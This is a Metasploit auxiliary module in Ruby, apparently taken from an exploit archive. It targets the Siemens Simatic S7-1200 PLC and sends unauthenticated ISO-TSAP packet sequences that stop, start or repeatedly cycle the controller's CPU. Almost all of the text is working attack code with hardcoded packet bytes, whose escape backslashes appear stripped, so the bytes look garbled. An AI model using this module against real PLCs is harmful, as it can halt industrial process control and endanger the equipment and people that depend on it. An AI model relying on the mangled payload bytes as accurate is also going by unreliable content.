Siemens Simatic S7-1200 CPU START/STOP Module

Posted on 16 July 2012

# Exploit Title: Siemens Simatic S7 1200 CPU command module # Date: 7-13-2012 # Exploit Author: Dillon Beresford # Vendor Homepage: http://www.siemens.com/ # Tested on: Siemens Simatic S7-1200 PLC # CVE : None require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name'=> 'Siemens Simatic S7-1200 CPU START/STOP Module', 'Description' => %q{ The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP this modules allows an attacker to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and START, allowing an attacker to end process control by the PLC. }, 'Author' => 'Dillon Beresford', 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ], [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ], ], 'Version' => '$Revision$', 'DisclosureDate' => 'May 09 2011' )) register_options( [ Opt::RPORT(102), OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]), OptInt.new('CYCLES',[true,"Set the amount of CPU STOP/RUN cycles.",10]) ], self.class) end def run_host(ip) begin cpu = datastore['MODE'] || '' cycles = datastore['CYCLES'] || '' stop_cpu_pkt = [ "x03x00x00x16x11xe0x00x00"+ "x00x3ax00xc1x02x06x00xc2"+ "x02x06x00xc0x01x0a", "x03x00x00xadx02xf0x80x72"+ "x01x00x9ex31x00x00x04xca"+ "x00x00x00x01x00x00x01x20"+ "x30x00x00x01x1dx00x04x00"+ "x00x00x00x00xa1x00x00x00"+ "xd3x82x1fx00x00xa3x81x69"+ "x00x15x16x53x65x72x76x65"+ "x72x53x65x73x73x69x6fx6e"+ "x5fx38x43x33x32x38x46x37"+ "x32xa3x82x21x00x15x00xa3"+ "x82x28x00x15x00xa3x82x29"+ "x00x15x00xa3x82x2ax00x15"+ "x09x50x4cx43x54x45x53x54"+ "x45x52xa3x82x2bx00x04x01"+ "xa3x82x2cx00x12x01xc9xc3"+ "x80xa3x82x2dx00x15x00xa1"+ "x00x00x00xd3x81x7fx00x00"+ "xa3x81x69x00x15x15x53x75"+ "x62x73x63x72x69x70x74x69"+ "x6fx6ex43x6fx6ex74x61x69"+ "x6ex65x72xa2xa2x00x00x00"+ "x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x02x00x00x03x84"+ "x30x00x00x00x32x01x9ax7b"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x03x00x00x03x84"+ "x30x00x00x00x20x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x04x00x00x03x84"+ "x30x00x00x00x31x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x05x00x00x03x84"+ "x30x00x00x00x32x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x06x00x00x03x84"+ "x30x00x00x00x33x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x07x00x00x03x84"+ "x30x00x00x00x34x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x08x00x00x03x84"+ "x30x00x00x00x40x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x09x00x00x03x84"+ "x30x88xe1x00x08x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0ax00x00x03x84"+ "x30x88xe1x00x07x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0bx00x00x03x84"+ "x30x00x00x00x21x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0cx00x00x03x84"+ "x30x00x00x00x41x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x0dx00x00x03x84"+ "x30x00x00x00x20x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x0ex00x00x03x84"+ "x30x00x00x00x31x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x0fx00x00x03x84"+ "x30x00x00x00x32x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x10x00x00x03x84"+ "x30x00x00x00x33x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x11x00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x12x00x00x03x84"+ "x30x00x00x00x40x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x13x00x00x03x84"+ "x30x88xe1x00x08x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x14x00x00x03x84"+ "x30x88xe1x00x07x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x15x00x00x03x84"+ "x30x00x00x00x21x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x16x00x00x03x84"+ "x30x00x00x00x41x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x2bx02xf0x80x72"+ "x01x00x1cx31x00x00x04xbb"+ "x00x00x00x17x00x00x03x84"+ "x30x00x00x00x08x00x00x01"+ "x01x00x00x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00xa3x02xf0x80x72"+ "x01x00x94x31x00x00x04xca"+ "x00x00x00x18x00x00x03x84"+ "x30x00x00x03x85x00x04x00"+ "x00x00x00x00xa1x4ex00x00"+ "x00x87x69x00x00xa3x81x69"+ "x00x15x17x53x75x62x73x63"+ "x72x69x70x74x69x6fx6ex5f"+ "x31x33x30x38x36x32x32x38"+ "x34x38xa3x87x6ax00x03x00"+ "x00xa3x87x6bx00x09x00xa3"+ "x88x10x00x02x02xa3x88x11"+ "x00x01x01xa1x4ex00x00x02"+ "x94x66x00x00xa3x81x69x00"+ "x15x00xa3x87x6dx00x02x02"+ "xa3x94x63x10x03x0ax00x00"+ "x00x00x00x00x00x00x00x00"+ "x00x00x00x00x00x00x00x00"+ "x00x00xa4x94x64x00x00x00"+ "x08xa2xa2x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x43x02xf0x80x72"+ "x01x00x34x31x00x00x04xf2"+ "x00x00x00x19x00x00x03x84"+ "x30x00x00x00x34x01x90x77"+ "x00x08x01x00x00x04xe8x89"+ "x69x00x12x00x00x00x00x89"+ "x6ax00x13x00x89x6bx00x04"+ "x00x00x00x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x3dx02xf0x80x72"+ "x01x00x2ex31x00x00x04xd4"+ "x00x00x00x1ax00x00x03x84"+ "x30x4ex00x00x00x00x00x00"+ "x04xe8x89x69x00x12x00x00"+ "x00x00x89x6ax00x13x00x89"+ "x6bx00x04x00x00x00x00x00"+ "x00x72x01x00x00", "x03x00x00x3dx02xf0x80x72"+ "x01x00x2ex31x00x00x04xd4"+ "x00x00x00x1bx00x00x03x84"+ "x30x00x00x03x84x00x00x00"+ "x04xe8x89x69x00x12x00x00"+ "x00x00x89x6ax00x13x00x89"+ "x6bx00x04x00x00x00x00x00"+ "x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00" ] start_cpu_pkt = [ "x03x00x00x16x11xe0x00x00"+ "x00x42x00xc1x02x06x00xc2"+ "x02x06x00xc0x01x0a", "x03x00x00xadx02xf0x80x72"+ "x01x00x9ex31x00x00x04xca"+ "x00x00x00x01x00x00x01x20"+ "x30x00x00x01x1dx00x04x00"+ "x00x00x00x00xa1x00x00x00"+ "xd3x82x1fx00x00xa3x81x69"+ "x00x15x16x53x65x72x76x65"+ "x72x53x65x73x73x69x6fx6e"+ "x5fx34x46x32x44x42x37x32"+ "x44xa3x82x21x00x15x00xa3"+ "x82x28x00x15x00xa3x82x29"+ "x00x15x00xa3x82x2ax00x15"+ "x09x50x4cx43x54x45x53x54"+ "x45x52xa3x82x2bx00x04x01"+ "xa3x82x2cx00x12x01xc9xc3"+ "x80xa3x82x2dx00x15x00xa1"+ "x00x00x00xd3x81x7fx00x00"+ "xa3x81x69x00x15x15x53x75"+ "x62x73x63x72x69x70x74x69"+ "x6fx6ex43x6fx6ex74x61x69"+ "x6ex65x72xa2xa2x00x00x00"+ "x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x02x00x00x03x84"+ "x30x00x00x00x32x01x9ax7b"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x03x00x00x03x84"+ "x30x00x00x00x31x01x9dx29"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x04x00x00x03x84"+ "x30x00x00x00x20x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x05x00x00x03x84"+ "x30x00x00x00x31x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x06x00x00x03x84"+ "x30x00x00x00x32x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x07x00x00x03x84"+ "x30x00x00x00x33x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x08x00x00x03x84"+ "x30x00x00x00x34x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x09x00x00x03x84"+ "x30x00x00x00x40x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0ax00x00x03x84"+ "x30x88xe1x00x08x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0bx00x00x03x84"+ "x30x88xe1x00x07x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0cx00x00x03x84"+ "x30x00x00x00x21x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0dx00x00x03x84"+ "x30x00x00x00x41x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x27x02xf0x80x72"+ "x01x00x18x31x00x00x05x24"+ "x00x00x00x0dx00x00x03x84"+ "x30x00x00x00x41x91x5ex00"+ "x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x0ex00x00x03x84"+ "x30x00x00x00x20x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x0fx00x00x03x84"+ "x30x00x00x00x31x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x10x00x00x03x84"+ "x30x00x00x00x32x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x11x00x00x03x84"+ "x30x00x00x00x33x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x12x00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x13x00x00x03x84"+ "x30x00x00x00x40x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x14x00x00x03x84"+ "x30x88xe1x00x08x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x15x00x00x03x84"+ "x30x88xe1x00x07x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x16x00x00x03x84"+ "x30x00x00x00x21x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x17x00x00x03x84"+ "x30x00x00x00x41x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x2bx02xf0x80x72"+ "x01x00x1cx31x00x00x04xbb"+ "x00x00x00x18x00x00x03x84"+ "x30x00x00x00x08x00x00x01"+ "x01x00x00x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00xa3x02xf0x80x72"+ "x01x00x94x31x00x00x04xca"+ "x00x00x00x19x00x00x03x84"+ "x30x00x00x03x85x00x04x00"+ "x00x00x00x00xa1x5dx00x00"+ "x00x87x69x00x00xa3x81x69"+ "x00x15x17x53x75x62x73x63"+ "x72x69x70x74x69x6fx6ex5f"+ "x31x35x36x30x32x38x31x30"+ "x38x38xa3x87x6ax00x03x00"+ "x00xa3x87x6bx00x09x00xa3"+ "x88x10x00x02x02xa3x88x11"+ "x00x01x01xa1x5dx00x00x02"+ "x94x66x00x00xa3x81x69x00"+ "x15x00xa3x87x6dx00x02x02"+ "xa3x94x63x10x03x0ax00x00"+ "x00x00x00x00x00x00x00x00"+ "x00x00x00x00x00x00x00x00"+ "x00x00xa4x94x64x00x00x00"+ "x08xa2xa2x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x1ax00x00x03x84"+ "x30x00x00x00x22x01x93x11"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x1bx00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x1cx00x00x03x84"+ "x30x00x00x00x22x01x93x11"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x40x02xf0x80x72"+ "x01x00x31x31x00x00x04xfc"+ "x00x00x00x1dx00x00x03x84"+ "x30x00x00x00x32x01x9ax7b"+ "x00x00x04xe8x89x69x00x12"+ "x00x00x00x00x89x6ax00x13"+ "x00x89x6bx00x04x00x00x00"+ "x00x00x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00xfex02xf0x80x72"+ "x01x00xefx31x00x00x04xca"+ "x00x00x00x1ex00x00x03x84"+ "x30x00x00x03x85x00x04x00"+ "x00x00x00x00xa1x5dx00x00"+ "x03x87x69x00x00xa3x81x69"+ "x00x15x17x53x75x62x73x63"+ "x72x69x70x74x69x6fx6ex5f"+ "x31x35x36x30x32x38x31x30"+ "x39x31xa3x87x6ax00x03x00"+ "x00xa3x87x6bx00x09x00xa3"+ "x88x10x00x02x01xa3x88x11"+ "x00x01x01xa1x5dx00x00x05"+ "x87x72x00x00xa3x81x69x00"+ "x15x13x41x74x74x72x69x62"+ "x75x74x52x65x66x65x72x65"+ "x6ex63x65x5fx31xa3x87x6d"+ "x00x02x05xa3x87x6fx00x12"+ "x00x00x00x03xa3x87x70x00"+ "x12x00x00x00x01xa3x87x73"+ "x20x04x01x93x2fxa3x88x05"+ "x00x04x00xa2xa1x5dx00x00"+ "x06x87x72x00x00xa3x81x69"+ "x00x15x13x41x74x74x72x69"+ "x62x75x74x52x65x66x65x72"+ "x65x6ex63x65x5fx32xa3x87"+ "x6dx00x02x02xa3x87x6fx00"+ "x12x00x00x00x03xa3x87x70"+ "x00x12x00x00x00x01xa3x87"+ "x73x20x04x01x9cx33xa3x88"+ "x05x00x04x00xa2xa2x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x2bx02xf0x80x72"+ "x01x00x1cx31x00x00x04xbb"+ "x00x00x00x1fx00x00x03x84"+ "x30x00x00x00x03x00x01x01"+ "x01x00x00x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x43x02xf0x80x72"+ "x01x00x34x31x00x00x04xf2"+ "x00x00x00x20x00x00x03x84"+ "x30x00x00x00x34x01x90x77"+ "x00x08x03x00x00x04xe8x89"+ "x69x00x12x00x00x00x00x89"+ "x6ax00x13x00x89x6bx00x04"+ "x00x00x00x00x00x00x00x72"+ "x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x21x00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x22x00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x07x02xf0x00", "x03x00x00x46x02xf0x80x72"+ "x01x00x37x31x00x00x05x4c"+ "x00x00x00x23x00x00x03x84"+ "x30x00x00x00x34x04x04x91"+ "x3dx9cx68x9cx67x81x69x00"+ "x00x04xe8x89x69x00x12x00"+ "x00x00x00x89x6ax00x13x00"+ "x89x6bx00x04x00x00x00x00"+ "x00x00x72x01x00x00", "x03x00x00x07x02xf0x00" ] if(cpu == 1) connect() stop_cpu_pkt.each do |i| sock.put("#{i}") sleep(0.005) end end if(cpu == 2) connect() start_cpu_pkt.each do |i| sock.put("#{i}") sleep(0.005) end end for n in 0..cycles if(cpu == 3) connect() stop_cpu_pkt.each do |i| sock.put("#{i}") sleep(0.005) end connect() start_cpu_pkt.each do |i| sock.put("#{i}") sleep(0.005) end end end data = sock.get_once() print_good("#{ip} is up, iso-tsap is open.") if(cpu == 'true') print_status("Putting the PLC into START mode.") elsif(cpu == 'false') print_status("Putting the PLC into STOP mode.") end disconnect() rescue ::EOFError end end end

TOP

Malware :

Last 20

Exploits :

Last 20